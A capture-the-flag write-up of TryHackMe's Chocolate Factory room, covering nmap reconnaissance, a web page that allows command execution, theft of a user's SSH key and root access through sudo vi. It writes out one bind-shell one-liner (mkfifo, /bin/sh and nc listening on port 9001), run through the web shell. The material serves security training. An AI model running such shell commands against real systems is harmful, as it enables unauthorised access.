This documents my adventures in TryHackMe’s Chocolate Factory room, which can be found here.
There are a few different ways to approach this room. I am only documenting one of them.
Phase 1: recon
The first step I took was running nmap to enumerate ports and services.
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
100/tcp open newacct
101/tcp open hostname
102/tcp open iso-tsap
103/tcp open gppitnp
104/tcp open acr-nema
105/tcp open csnet-ns
106/tcp open pop3pw
107/tcp open rtelnet
108/tcp open snagas
109/tcp open pop2
110/tcp open pop3
111/tcp open rpcbind
112/tcp open mcidas
113/tcp open ident
114/tcp open audionews
115/tcp open sftp
116/tcp open ansanotify
117/tcp open uucp-path
118/tcp open sqlserv
119/tcp open nntp
120/tcp open cfdptkt
121/tcp open erpc
122/tcp open smakynet
123/tcp open ntp
124/tcp open ansatrader
125/tcp open locus-map
MAC Address: 02:98:7F:CD:DA:A5 (Unknown)PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r — 1 1000 1000 208838 Sep 30 2020 gum_room.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.227.151
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 — secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1631bbb51fcccc12148ff0d833b0089b (RSA)
| 256 e71fc9db3eaa44b672103ceedb1d3390 (ECDSA)
|_ 256 b44502b6248ea9065f6c79448a06555e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
100/tcp open newacct?
| fingerprint-strings:
| Help, TerminalServer:
| “Welcome to chocolate room!!
| ___. — — — — — — — -.
| .’__’__’__’__’__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \’__’__’__’__’_`.__| `. \x20 ___ \r
| \’__’__’__\x20__’_; — — — — — — — — -`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus”
106/tcp open pop3pw?
| fingerprint-strings:
| LDAPSearchReq, RPCCheck:
| “Welcome to chocolate room!!
| ___. — — — — — — — -.
| .’__’__’__’__’__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \’__’__’__’__’_`.__| `. \x20 ___ \r
| \’__’__’__\x20__’_; — — — — — — — — -`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus”
109/tcp open pop2?
| fingerprint-strings:
| RTSPRequest, TerminalServer:
| “Welcome to chocolate room!!
| ___. — — — — — — — -.
| .’__’__’__’__’__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \’__’__’__’__’_`.__| `. \x20 ___ \r
| \’__’__’__\x20__’_; — — — — — — — — -`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus”
110/tcp open pop3?
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions:
| “Welcome to chocolate room!!
| ___. — — — — — — — -.
| .’__’__’__’__’__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \’__’__’__’__’_`.__| `. \x20 ___ \r
| \’__’__’__\x20__’_; — — — — — — — — -`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus”
111/tcp open rpcbind?
| fingerprint-strings:
| Help, X11Probe:
| “Welcome to chocolate room!!
| ___. — — — — — — — -.
| .’__’__’__’__’__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \’__’__’__’__’_`.__| `. \x20 ___ \r
| \’__’__’__\x20__’_; — — — — — — — — -`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus”
113/tcp open ident?
| fingerprint-strings:
| HTTPOptions, NotesRPC:
|_ http://localhost/key_rev_key <- You will find the key here!!!
119/tcp open nntp?
| fingerprint-strings:
| HTTPOptions, LDAPSearchReq:
| “Welcome to chocolate room!!
| ___. — — — — — — — -.
| .’__’__’__’__’__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \’__’__’__’__’_`.__| `. \x20 ___ \r
| \’__’__’__\x20__’_; — — — — — — — — -`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus”
125/tcp open locus-map?
| fingerprint-strings:
| GenericLines, NULL:
| “Welcome to chocolate room!!
| ___. — — — — — — — -.
| .’__’__’__’__’__,` . ____ ___ \r
| _:\x20 |:. \x20 ___ \r
| \’__’__’__’__’_`.__| `. \x20 ___ \r
| \’__’__’__\x20__’_; — — — — — — — — -`
| \|______________________;________________|
| small hint from Mr.Wonka : Look somewhere else, its not here! ;)
|_ hope you wont drown Augustus”Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT ADDRESS
1 12.95 ms ip-10–10–26–141.eu-west-1.compute.internal (10.10.26.141)
This was a monstrous amount of output, but I quickly focused on only a few of the ports, since most of them have the same output telling me to look elsewhere.
The ports worth investigating:
- 21: FTP with anonymous login
- 22: SSH
- 80: HTTP Web servers almost always hold useful information
- 113: The message from the port scan told me I’ll find a key here. Seems important.
Port 113: ident
This protocol wasn’t relevant as far as I could tell, but it did tell me to look for a specific file on the HTTP server.
113/tcp open ident?
| fingerprint-strings:
| HTTPOptions, NotesRPC:
|_ http://localhost/key_rev_key <- You will find the key here!!!
Looking at the new file, it is an executable.
Using the most efficient (laziest) reverse engineering technique, I found the hidden key. What is this for? You will find out later…
Port 80: HTTP
The webpage shows a login panel. When I attempted a login, I saw that it directed me to a .php page.
The next step I took was to enumerate any other pages that might be hosted on the server, specifically looking for other php or html pages.
The screenshot was taken when it was partially complete, but after finishing nothing new had been discovered. That said, home.php was a discovery.
What a discovery! This allows system commands to be run right in the browser.
Phase 2: access
The webpage allows remote code execution, making my job a lot easier.
In the web shell I ran the following in order to open a bind shell:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 9001 > /tmp/f
Credit goes to https://www.revshells.com/.
And with that, I had gotten onto the system.
Phase 3: escalation
In this case, escalation happened in a few steps.
Lateral escalation
The first of these started by poking around the machine as www-data.
In the directory /home/charlie a file was found called teleport. It had Charlie’s private SSH key.
With a private SSH key, I opened a session as user charlie over SSH. Two benefits come from this.
- I gain access to a user account, which generally have more privileges than
www-data. - SSH is a stable shell with autocomplete and arrow keys built in. No need to stabilize the shell manually.
I’m in.
Getting root
I looked first at what could be run as root without a password, and lucky me! vi had no password.
Thanks to some help from GTFOBins, I was quickly able to spawn a root shell.
That’s the box… right? Not quite. I order to access the root flag, I had to use that key from earlier.
In the /root directory, there is not a txt file, but rather a Python file. It asks for a key. When prompted, the key found earlier prints the flag.
